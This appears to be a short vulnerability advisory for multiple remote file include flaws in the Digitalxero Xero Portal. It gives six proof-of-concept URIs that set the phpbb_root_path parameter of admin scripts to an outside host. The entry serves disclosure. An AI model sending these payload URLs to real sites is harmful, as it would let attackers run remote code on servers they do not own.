|
Digitalxero Xero Portal PHPBB_Root_Path Multiple Remote File Include Vulnerabilities
An attacker can exploit these issues via a web client. The following proof-of-concept URIs are available. http://www.example.com/admin/admin_linkdb.php?phpbb_root_path=http://www,example2.com http://www.example.com/admin/admin_forum_prune.php?phpbb_root_path=http://www,example2.com http://www.example.com/admin/admin_extensions.php?phpbb_root_path=http://www,example2.com http://www.example.com/admin/admin_board.php?phpbb_root_path=http://www,example2.com http://www.example.com/admin/admin_attachments.php?phpbb_root_path=http://www,example2.com http://www.example.com/admin/admin_users.php?phpbb_root_path=http://www,example2.com |
|
|
Privacy Statement |
